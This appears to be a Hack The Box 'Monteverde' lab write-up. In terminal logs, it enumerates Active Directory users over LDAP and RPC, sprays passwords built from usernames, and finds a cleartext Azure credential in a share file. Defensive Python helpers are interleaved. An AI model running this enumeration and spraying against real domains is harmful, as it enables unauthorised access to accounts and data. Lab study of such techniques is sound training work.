nmap scan
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ nmap -sV -sC -oA mantis 10.10.10.172 -pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-24 07:41 EDT
zsh: segmentation fault nmap -sV -sC -oA mantis 10.10.10.172 -pn
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ nmap -sV -sC -oA Monteverde 10.10.10.172 -Pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-24 07:41 EDT
Nmap scan report for 10.10.10.172
Host is up (0.36s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-09-24 11:42:15Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-09-24T11:42:53
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 167.93 seconds
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$
Running a full port scan in the background to check later whether any other ports are open.
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ crackmapexec smb 10.10.10.172 -u '' -p ''
SMB 10.10.10.172 445 MONTEVERDE [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK.LOCAL\:
┌──(kali㉿kali)-[~/HTB/Monteverde]
adding the domain to the hosts file
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.10.175 EGOTISTICAL-BANK.LOCAL
10.10.10.100 active.htb htb
10.10.10.192 blackfield.local
10.10.10.182 cascade.local
10.10.11.152 timelapse.htb
10.10.10.169 megabank.local resolute.megabank.local
10.10.10.52 htb.local mantis.htb.local
10.10.10.179 MEGACORP.LOCAL MULTIMASTER.MEGACORP.LOCAL
10.10.10.172 MEGABANK.LOCAL MONTEVERDE.MEGABANK.LOCAL
Doing an ldapsearch (anonymous bind is allowed) and we get some users.
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ ldapsearch -x -H ldap://10.10.10.172 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingcontexts: DC=MEGABANK,DC=LOCAL
namingcontexts: CN=Configuration,DC=MEGABANK,DC=LOCAL
namingcontexts: CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL
namingcontexts: DC=DomainDnsZones,DC=MEGABANK,DC=LOCAL
namingcontexts: DC=ForestDnsZones,DC=MEGABANK,DC=LOCAL
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ ldapsearch -x -H ldap://10.10.10.172 -b 'DC=megabank,DC=local' -s sub '(objectClass=person)' sAMAccountName | grep 'sAMAccountName:' | awk -F ': ' '{print $2}'
Guest
MONTEVERDE$
AAD_987d7f2f57d2
mhope
SABatchJobs
svc-ata
svc-bexec
svc-netapp
dgalanos
roleary
smorgan
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$
adding the names to a text file users.txt
using kerbrute to check which are valid
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ ./kerbrute userenum --dc 10.10.10.172 -d megabank.LOCAL users.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 09/24/23 - Ronnie Flathers @ropnop
2023/09/24 07:53:54 > Using KDC(s):
2023/09/24 07:53:54 > 10.10.10.172:88
2023/09/24 07:53:55 > [+] VALID USERNAME: [email protected]
2023/09/24 07:53:55 > [+] VALID USERNAME: [email protected]
2023/09/24 07:53:55 > [+] VALID USERNAME: [email protected]
2023/09/24 07:53:55 > [+] VALID USERNAME: [email protected]
2023/09/24 07:53:55 > [+] VALID USERNAME: [email protected]
2023/09/24 07:53:55 > [+] VALID USERNAME: [email protected]
2023/09/24 07:53:55 > [+] VALID USERNAME: [email protected]
2023/09/24 07:53:55 > [+] VALID USERNAME: [email protected]
2023/09/24 07:53:55 > [+] VALID USERNAME: [email protected]
2023/09/24 07:53:55 > [+] VALID USERNAME: [email protected]
2023/09/24 07:53:55 > [+] VALID USERNAME: [email protected]
2023/09/24 07:53:55 > Done! Tested 11 usernames (11 valid) in 0.864 seconds
┌──(kali㉿kali)-[~/HTB/Monteverde]
Checking whether any of the users have Kerberos pre-authentication disabled so we could get an AS-REP hash, but we get nothing.
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ while read -r user; do
./GetNPUsers.py megabank.LOCAL/$user -no-pass -dc-ip 10.10.10.172
done < /home/kali/HTB/Monteverde/users.txt
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for administrator
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for MONTEVERDE$
[-] User MONTEVERDE$ doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for AAD_987d7f2f57d2
[-] User AAD_987d7f2f57d2 doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for mhope
[-] User mhope doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for SABatchJobs
[-] User SABatchJobs doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for svc-ata
[-] User svc-ata doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for svc-bexec
[-] User svc-bexec doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for svc-netapp
[-] User svc-netapp doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for dgalanos
[-] User dgalanos doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for roleary
[-] User roleary doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for smorgan
[-] User smorgan doesn't have UF_DONT_REQUIRE_PREAUTH set
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$
Checking the account descriptions via ldapsearch, but nothing useful.
└─$ ldapsearch -x -H ldap://10.10.10.172 -b "DC=megabank,DC=local" -s sub "(objectClass=user)" sAMAccountName description
# extended LDIF
#
# LDAPv3
# base <DC=megabank,DC=local> with scope subtree
# filter: (objectClass=user)
# requesting: sAMAccountName description
#
# Guest, Users, MEGABANK.LOCAL
dn: CN=Guest,CN=Users,DC=MEGABANK,DC=LOCAL
description: Built-in account for guest access to the computer/domain
sAMAccountName: Guest
# MONTEVERDE, Domain Controllers, MEGABANK.LOCAL
dn: CN=MONTEVERDE,OU=Domain Controllers,DC=MEGABANK,DC=LOCAL
sAMAccountName: MONTEVERDE$
# AAD_987d7f2f57d2, Users, MEGABANK.LOCAL
dn: CN=AAD_987d7f2f57d2,CN=Users,DC=MEGABANK,DC=LOCAL
description: Service account for the Synchronization Service with installation
identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVER
DE.
sAMAccountName: AAD_987d7f2f57d2
# Mike Hope, London, MegaBank Users, MEGABANK.LOCAL
dn: CN=Mike Hope,OU=London,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
sAMAccountName: mhope
# SABatchJobs, Service Accounts, MEGABANK.LOCAL
dn: CN=SABatchJobs,OU=Service Accounts,DC=MEGABANK,DC=LOCAL
sAMAccountName: SABatchJobs
# svc-ata, Service Accounts, MEGABANK.LOCAL
dn: CN=svc-ata,OU=Service Accounts,DC=MEGABANK,DC=LOCAL
sAMAccountName: svc-ata
# svc-bexec, Service Accounts, MEGABANK.LOCAL
dn: CN=svc-bexec,OU=Service Accounts,DC=MEGABANK,DC=LOCAL
sAMAccountName: svc-bexec
# svc-netapp, Service Accounts, MEGABANK.LOCAL
dn: CN=svc-netapp,OU=Service Accounts,DC=MEGABANK,DC=LOCAL
sAMAccountName: svc-netapp
# Dimitris Galanos, Athens, MegaBank Users, MEGABANK.LOCAL
dn: CN=Dimitris Galanos,OU=Athens,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
sAMAccountName: dgalanos
# Ray O'Leary, Toronto, MegaBank Users, MEGABANK.LOCAL
dn: CN=Ray O'Leary,OU=Toronto,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
sAMAccountName: roleary
# Sally Morgan, New York, MegaBank Users, MEGABANK.LOCAL
dn: CN=Sally Morgan,OU=New York,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
sAMAccountName: smorgan
# search reference
ref: ldap://ForestDnsZones.MEGABANK.LOCAL/DC=ForestDnsZones,DC=MEGABANK,DC=LOC
AL
# search reference
ref: ldap://DomainDnsZones.MEGABANK.LOCAL/DC=DomainDnsZones,DC=MEGABANK,DC=LOC
AL
# search reference
ref: ldap://MEGABANK.LOCAL/CN=Configuration,DC=MEGABANK,DC=LOCAL
# search result
search: 2
result: 0 Success
# numResponses: 15
# numEntries: 11
# numReferences: 3
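The grep/awk one-liner used earlier works for sAMAccountName but would truncate folded LDIF values such as the AAD_ account's description (ldapsearch wraps long values onto continuation lines that begin with a space). An added example, not from the original write-up: a small LDIF parser that unfolds continuation lines, handles base64 (::) values, and picks out the sync-service account from a constructed excerpt modelled on the output above.

```python
"""Parse ldapsearch LDIF output with line folding (added example, not from the
write-up). SAMPLE_LDIF is a constructed excerpt modelled on the page's output;
note the folded 'description' value that a grep/awk pipeline would truncate."""
import base64
import re

SAMPLE_LDIF = """\
# extended LDIF
#
# LDAPv3
# base <DC=megabank,DC=local> with scope subtree
# filter: (objectClass=user)
# requesting: sAMAccountName description
#

# AAD_987d7f2f57d2, Users, MEGABANK.LOCAL
dn: CN=AAD_987d7f2f57d2,CN=Users,DC=MEGABANK,DC=LOCAL
description: Service account for the Synchronization Service with installation
  identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVER
 DE.
sAMAccountName: AAD_987d7f2f57d2
objectGUID:: //79/A==

# SABatchJobs, Service Accounts, MEGABANK.LOCAL
dn: CN=SABatchJobs,OU=Service Accounts,DC=MEGABANK,DC=LOCAL
sAMAccountName: SABatchJobs

# search reference
ref: ldap://ForestDnsZones.MEGABANK.LOCAL/DC=ForestDnsZones,DC=MEGABANK,DC=LOC
 AL

# search result
search: 2
result: 0 Success
"""

# "attr: value" or "attr:: base64value"; the space after the colon is optional
ATTR_RE = re.compile(r"^([A-Za-z][\w;.-]*)(::?) ?(.*)$")


def unfold(lines):
    """Join LDIF continuation lines (leading space) onto the previous line."""
    out = []
    for line in lines:
        if line.startswith(" ") and out:
            out[-1] += line[1:]          # the fold marker itself is dropped
        else:
            out.append(line)
    return out


def parse_ldif(text):
    """Return records as {attribute: [values]}; comments are skipped, blank
    lines separate records, '::' values are base64 (binary shown as hex)."""
    records, current = [], {}
    for line in unfold(text.splitlines()):
        if line.startswith("#"):
            continue
        if not line.strip():
            if current:
                records.append(current)
                current = {}
            continue
        m = ATTR_RE.match(line)
        if not m:
            raise ValueError(f"malformed LDIF line: {line!r}")
        attr, sep, value = m.groups()
        if sep == "::":
            raw = base64.b64decode(value)
            try:
                value = raw.decode("utf-8")
            except UnicodeDecodeError:
                value = raw.hex()
        current.setdefault(attr, []).append(value)
    if current:
        records.append(current)
    return records


def entries(text):
    """Only real directory entries (those with a dn), not refs or the trailer."""
    return [r for r in parse_ldif(text) if "dn" in r]


def account_descriptions(text):
    """Map sAMAccountName -> full unfolded description ('' when absent)."""
    return {r["sAMAccountName"][0]: r.get("description", [""])[0]
            for r in entries(text) if "sAMAccountName" in r}


def sync_service_accounts(text):
    """Accounts whose description names the Azure AD Connect sync service;
    they identify the server holding the AD Connect database."""
    return [name for name, desc in account_descriptions(text).items()
            if "Synchronization Service" in desc]
```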
Also checked for custom object types, but nothing stands out. Excerpt below:
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ldapsearch -x -H ldap://10.10.10.172 -b 'DC=megabank,DC=local' -s sub | awk '{print $1}' | sort | uniq -c | sort -nr
697 dSCorePropagationData:
548 objectClass:
281 #
272
267 dn:
246 whenCreated:
246 whenChanged:
246 uSNCreated:
246 uSNChanged:
246 objectGUID::
246 objectCategory:
246 name:
246 instanceType:
246 distinguishedName:
222 cn:
177 showInAdvancedViewOnly:
102 System,DC=MEGABANK,DC=LOCAL
88 BANK.LOCAL
87 mainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
87 isCriticalSystemObject:
Trying rpcclient; we find the same users.
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ rpcclient -U '' -N 10.10.10.172
rpcclient $> lookup smorgan
command not found: lookup
rpcclient $> lookupnames smorgan
result was NT_STATUS_ACCESS_DENIED
rpcclient $> lookupnames SABatchJobs
result was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomusers
user:[Guest] rid:[0x1f5]
user:[AAD_987d7f2f57d2] rid:[0x450]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0xa2a]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[svc-netapp] rid:[0xa2d]
user:[dgalanos] rid:[0xa35]
user:[roleary] rid:[0xa36]
user:[smorgan] rid:[0xa37]
rpcclient $>
rpcclient $> enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Azure Admins] rid:[0xa29]
group:[File Server Admins] rid:[0xa2e]
group:[Call Recording Admins] rid:[0xa2f]
group:[Reception] rid:[0xa30]
group:[Operations] rid:[0xa31]
group:[Trading] rid:[0xa32]
group:[HelpDesk] rid:[0xa33]
group:[Developers] rid:[0xa34]
rpcclient $>
trying to enumerate the shares
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ crackmapexec smb 10.10.10.172 -u '' -p ''
SMB 10.10.10.172 445 MONTEVERDE [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK.LOCAL\:
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ crackmapexec smb 10.10.10.172 -u '' -p '' --shares
SMB 10.10.10.172 445 MONTEVERDE [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK.LOCAL\:
SMB 10.10.10.172 445 MONTEVERDE [-] Error enumerating shares: STATUS_ACCESS_DENIED
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ smbclient -L //10.10.10.172
Password for [WORKGROUP\kali]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.172 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ smbclient -L //10.10.10.172 -N -U%
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.172 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Running out of options, so we will try creating a password list to brute-force with.
First we check the password policy and we can see "Account Lockout Threshold: None", so guessing will not lock any accounts out.
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ crackmapexec smb 10.10.10.172 --pass-pol
SMB 10.10.10.172 445 MONTEVERDE [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.172 445 MONTEVERDE [+] Dumping password info for domain: MEGABANK
SMB 10.10.10.172 445 MONTEVERDE Minimum password length: 7
SMB 10.10.10.172 445 MONTEVERDE Password history length: 24
SMB 10.10.10.172 445 MONTEVERDE Maximum password age: 41 days 23 hours 53 minutes
SMB 10.10.10.172 445 MONTEVERDE
SMB 10.10.10.172 445 MONTEVERDE Password Complexity Flags: 000000
SMB 10.10.10.172 445 MONTEVERDE Domain Refuse Password Change: 0
SMB 10.10.10.172 445 MONTEVERDE Domain Password Store Cleartext: 0
SMB 10.10.10.172 445 MONTEVERDE Domain Password Lockout Admins: 0
SMB 10.10.10.172 445 MONTEVERDE Domain Password No Clear Change: 0
SMB 10.10.10.172 445 MONTEVERDE Domain Password No Anon Change: 0
SMB 10.10.10.172 445 MONTEVERDE Domain Password Complex: 0
SMB 10.10.10.172 445 MONTEVERDE
SMB 10.10.10.172 445 MONTEVERDE Minimum password age: 1 day 4 minutes
SMB 10.10.10.172 445 MONTEVERDE Reset Account Lockout Counter: 30 minutes
SMB 10.10.10.172 445 MONTEVERDE Locked Account Duration: 30 minutes
SMB 10.10.10.172 445 MONTEVERDE Account Lockout Threshold: None
SMB 10.10.10.172 445 MONTEVERDE Forced Log off Time: Not Set
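Defender's view of the policy dump above, as an added example (not from the write-up): parse the crackmapexec --pass-pol lines and flag the settings that make an unthrottled, username-as-password spray possible. The sample is copied from the output above; the 14-character minimum is an assumed hardening baseline, not something the page states.

```python
"""Evaluate a domain password policy as dumped by crackmapexec --pass-pol.
Added example, not from the write-up. SAMPLE_PASS_POL is copied from the
output above; BASELINE_MIN_LENGTH is an assumed hardening baseline."""
import re

BASELINE_MIN_LENGTH = 14

SAMPLE_PASS_POL = """\
SMB 10.10.10.172 445 MONTEVERDE [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.172 445 MONTEVERDE [+] Dumping password info for domain: MEGABANK
SMB 10.10.10.172 445 MONTEVERDE Minimum password length: 7
SMB 10.10.10.172 445 MONTEVERDE Password history length: 24
SMB 10.10.10.172 445 MONTEVERDE Maximum password age: 41 days 23 hours 53 minutes
SMB 10.10.10.172 445 MONTEVERDE Password Complexity Flags: 000000
SMB 10.10.10.172 445 MONTEVERDE Domain Password Complex: 0
SMB 10.10.10.172 445 MONTEVERDE Minimum password age: 1 day 4 minutes
SMB 10.10.10.172 445 MONTEVERDE Reset Account Lockout Counter: 30 minutes
SMB 10.10.10.172 445 MONTEVERDE Locked Account Duration: 30 minutes
SMB 10.10.10.172 445 MONTEVERDE Account Lockout Threshold: None
SMB 10.10.10.172 445 MONTEVERDE Forced Log off Time: Not Set
"""

# "SMB <ip> <port> <host> <Key>: <value>"; status lines start with [*]/[+]
# and therefore never match, nor do the blank separator lines.
LINE_RE = re.compile(r"^SMB\s+\S+\s+\d+\s+\S+\s+([A-Za-z][A-Za-z ]*?):\s*(.*)$")


def parse_pass_pol(text: str) -> dict:
    """Turn the tool output into {setting: value} strings."""
    policy = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            policy[m.group(1).strip()] = m.group(2).strip()
    return policy


def evaluate_policy(policy: dict) -> list:
    """Return (severity, finding) pairs for settings that favour online guessing."""
    findings = []
    threshold = policy.get("Account Lockout Threshold", "").lower()
    if threshold in ("", "none", "0"):
        findings.append(("high", "no lockout threshold: failed logons never lock the "
                                 "account, so spraying is limited only by monitoring"))
    else:
        window = policy.get("Reset Account Lockout Counter", "unknown")
        findings.append(("info", f"lockout after {threshold} failures, "
                                 f"counter resets after {window}"))
    # with complexity off, the rule rejecting the account name as the password
    # is not enforced (this is what let SABatchJobs:SABatchJobs exist)
    if policy.get("Domain Password Complex") == "0":
        findings.append(("high", "password complexity disabled: account name "
                                 "and dictionary words are accepted as passwords"))
    try:
        length = int(policy.get("Minimum password length", "0"))
        if length < BASELINE_MIN_LENGTH:
            findings.append(("medium", f"minimum length {length} is below the "
                                       f"assumed baseline of {BASELINE_MIN_LENGTH}"))
    except ValueError:
        findings.append(("info", "minimum password length could not be parsed"))
    return findings


if __name__ == "__main__":
    for severity, finding in evaluate_policy(parse_pass_pol(SAMPLE_PASS_POL)):
        print(f"[{severity}] {finding}")
```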
Creating a password list with John the Ripper by running the usernames through its mangling rules.
└─$ john --wordlist=users.txt --rules --stdout > users2.txt
using crackmapexec to try and bruteforce
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ crackmapexec smb 10.10.10.172 -u users.txt -p users4.txt
SMB 10.10.10.172 445 MONTEVERDE [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs
user SABatchJobs and password SABatchJobs
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ crackmapexec smb 10.10.10.172 -u SABatchJobs -p SABatchJobs --shares
SMB 10.10.10.172 445 MONTEVERDE [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs
SMB 10.10.10.172 445 MONTEVERDE [+] Enumerated shares
SMB 10.10.10.172 445 MONTEVERDE Share Permissions Remark
SMB 10.10.10.172 445 MONTEVERDE ----- ----------- ------
SMB 10.10.10.172 445 MONTEVERDE ADMIN$ Remote Admin
SMB 10.10.10.172 445 MONTEVERDE azure_uploads READ
SMB 10.10.10.172 445 MONTEVERDE C$ Default share
SMB 10.10.10.172 445 MONTEVERDE E$ Default share
SMB 10.10.10.172 445 MONTEVERDE IPC$ READ Remote IPC
SMB 10.10.10.172 445 MONTEVERDE NETLOGON READ Logon server share
SMB 10.10.10.172 445 MONTEVERDE SYSVOL READ Logon server share
SMB 10.10.10.172 445 MONTEVERDE users$ READ
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ crackmapexec winrm 10.10.10.172 -u SABatchJobs -p SABatchJobs --shares
usage: crackmapexec [-h] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL] [--darrell]
[--verbose]
{ldap,smb,mssql,rdp,ftp,winrm,ssh} ...
crackmapexec: error: unrecognized arguments: --shares
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ crackmapexec winrm 10.10.10.172 -u SABatchJobs -p SABatchJobs
SMB 10.10.10.172 5985 MONTEVERDE [*] Windows 10.0 Build 17763 (name:MONTEVERDE) (domain:MEGABANK.LOCAL)
HTTP 10.10.10.172 5985 MONTEVERDE [*] http://10.10.10.172:5985/wsman
WINRM 10.10.10.172 5985 MONTEVERDE [-] MEGABANK.LOCAL\SABatchJobs:SABatchJobs
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ smbclient //10.10.10.172/users$ -U SABatchJobs%SABatchJobs
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Jan 3 08:12:48 2020
.. D 0 Fri Jan 3 08:12:48 2020
dgalanos D 0 Fri Jan 3 08:12:30 2020
mhope D 0 Fri Jan 3 08:41:18 2020
roleary D 0 Fri Jan 3 08:10:30 2020
smorgan D 0 Fri Jan 3 08:10:24 2020
31999 blocks of size 4096. 28979 blocks available
smb: \> cd dgalanos\
smb: \dgalanos\> ls
. D 0 Fri Jan 3 08:12:30 2020
.. D 0 Fri Jan 3 08:12:30 2020
cd .
31999 blocks of size 4096. 28979 blocks available
smb: \dgalanos\> cd ../
smb: \> cd mhop
cd \mhop\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \> cd mhope
smb: \mhope\> ls
. D 0 Fri Jan 3 08:41:18 2020
.. D 0 Fri Jan 3 08:41:18 2020
azure.xml AR 1212 Fri Jan 3 08:40:23 2020
31999 blocks of size 4096. 28979 blocks available
smb: \mhope\> get azure.xml
getting file \mhope\azure.xml of size 1212 as azure.xml (0.7 KiloBytes/sec) (average 0.7 KiloBytes/sec)
smb: \mhope\> cd ../
smb: \> cd rolearty
cd \rolearty\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \> cd roleary
smb: \roleary\> ls
. D 0 Fri Jan 3 08:10:30 2020
.. D 0 Fri Jan 3 08:10:30 2020
cd ../
31999 blocks of size 4096. 28979 blocks available
smb: \roleary\> cd ../
smb: \> cd smorgan
smb: \smorgan\> ls
. D 0 Fri Jan 3 08:10:24 2020
.. D 0 Fri Jan 3 08:10:24 2020
31999 blocks of size 4096. 28979 blocks available
smb: \smorgan\> ^C
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$ smbclient //10.10.10.172/azure_uploads -U SABatchJobs%SABatchJobs
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Jan 3 07:43:06 2020
.. D 0 Fri Jan 3 07:43:06 2020
31999 blocks of size 4096. 28979 blocks available
smb: \> SMBecho failed (NT_STATUS_CONNECTION_RESET). The connection is disconnected now
checking the xml file
└─$ cat azure.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
<T>System.Object</T>
</TN>
<ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
<Props>
<DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
<DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
<G N="KeyId">00000000-0000-0000-0000-000000000000</G>
<S N="Password">4n0therD4y@n0th3r$</S>
</Props>
</Obj>
</Objs>
┌──(kali㉿kali)-[~/HTB/Monteverde]
└─$
We see a password in there: 4n0therD4y@n0th3r$
We check the password against the user list and find that it is the password for mhope.
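The azure.xml file is PowerShell CLIXML (Export-Clixml output). PSADPasswordCredential stores Password as a plain string, so it lands on disk in clear text, unlike a PSCredential whose SecureString is written as a DPAPI-protected SS element. Added example, not from the write-up: a scanner that handles the BOM (the stray bytes before Objs in the cat output above), walks the CLIXML and reports secret-bearing properties without printing their values. The sample is constructed in the shape of azure.xml with a placeholder password.

```python
"""Scan PowerShell CLIXML files for properties that carry secrets.
Added example, not from the write-up. SAMPLE_CLIXML is constructed in the
shape of the azure.xml found on the share, with a placeholder password."""
import codecs
import xml.etree.ElementTree as ET
from pathlib import Path

PS_NS = "http://schemas.microsoft.com/powershell/2004/04"
# property names that usually hold credential material (assumed heuristic)
SENSITIVE = ("password", "secret", "token", "passphrase")

SAMPLE_CLIXML = codecs.BOM_UTF16_LE + """\
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">PLACEHOLDER-Secret-1</S>
    </Props>
  </Obj>
</Objs>
""".encode("utf-16-le")


def decode_clixml(raw: bytes) -> str:
    """Strip a UTF-16/UTF-8 BOM (Export-Clixml writes one) and decode."""
    if raw.startswith(codecs.BOM_UTF16_LE) or raw.startswith(codecs.BOM_UTF16_BE):
        return raw.decode("utf-16")          # the utf-16 codec consumes the BOM
    if raw.startswith(codecs.BOM_UTF8):
        return raw.decode("utf-8-sig")
    return raw.decode("utf-8", errors="replace")


def find_secrets(xml_text: str) -> list:
    """Report secret-looking <Props> entries; values are never returned,
    only their length and whether they were stored in clear text."""
    hits = []
    for obj in ET.fromstring(xml_text).iter(f"{{{PS_NS}}}Obj"):
        types = [t.text for t in obj.findall(f"{{{PS_NS}}}TN/{{{PS_NS}}}T")]
        props = obj.find(f"{{{PS_NS}}}Props")
        if props is None:
            continue
        for prop in props:
            name = prop.get("N", "")
            value = (prop.text or "").strip()
            if not value or not any(s in name.lower() for s in SENSITIVE):
                continue
            tag = prop.tag.split("}")[-1]
            hits.append({
                "type": types[0] if types else "(untyped)",
                "property": name,
                "length": len(value),
                # <S> is a plain string; <SS> is a DPAPI-protected SecureString
                "plaintext": tag == "S",
            })
    return hits


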